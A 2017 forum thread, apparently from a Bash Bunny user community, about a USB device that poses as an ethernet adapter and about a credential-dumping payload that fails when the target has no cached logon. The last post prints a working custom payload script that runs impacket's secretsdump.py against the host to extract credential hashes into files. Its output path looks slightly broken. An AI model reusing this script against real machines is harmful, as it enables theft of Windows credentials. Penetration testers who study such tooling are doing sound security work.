Altecheon Posted April 14, 2017 Share Posted April 14, 2017 I understand that part of the plan for the BB was Man in the Middle attacks, which is why I am running into an issue with one of the payloads I am playing around with. In an enterprise environment the system, unless its a laptop, may not cache credentials that you may have obtained. This being said if the user is not currently logged into the machine or has not logged in for a while, the system will attempt to reach out to a log in server. If the BB is the route the system takes to reach the internet, then the computer will throw an error like this Quote "SMB SessionError: STATUS_NO_LOGON_SERVERS(No logon servers are currently available to service the logon request.)" All of that being said, i think a feature that may be helpful would be to allow for configuration of the Ethernet modes. This would allow you to set the connection to slower than most networks or maybe having no connection to the internet. This would also help when you do not wish to interrupt internet connectivity for the device. I cannot say that you cannot configure this already, but I can say I do not know how to configure this and that I am curious as to how I would do this. Quote Link to comment Share on other sites More sharing options...
LowValueTarget Posted April 14, 2017 Share Posted April 14, 2017 As far as I understand at the moment, when the BB is plugged into a host machine, and is acting as an ethernet adapter (RNDIS_ETHERNET, ECM_ETHERNET), it generally registers as the fastest (2GBps) and defaults to the primary interface. That being said, when the BB is the primary interface, it does not have internet access, nor does the host machine utilizing it. What payload are you working with that is having issues? Is it a custom payload? Can you share it? Quote Link to comment Share on other sites More sharing options...
Altecheon Posted April 14, 2017 Author Share Posted April 14, 2017 It is a custom payload using impacket at the old firmware location. It assumes that you know the domain/user and password to pull credentials from a PC. If the account is cached, it executes, but if not it fails due to contacting the login server. I have also figured out that the use of an @ or a colon in a password causes issues for the impacket code. Quote USER=domain/Genericuser PASS=GenericPassword LED R SLOW ATTACKMODE RNDIS_ETHERNET GET TARGET_HOSTNAME GET TARGET_IP #if target does not get an IP give fail LED if [ -z "${TARGET_IP}" ]; then LED R 100 exit 1 fi cd /pentest/impacket/examples if [ ! -d "temp" ]; then mkdir temp fi python secretsdump.py $USER:$PASS@$TARGET_IP -outputfile temp/$TARGET_HOSTNAME > temp/$temp/$TARGET_HOSTNAME.outputfile sync LED G SLOW Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.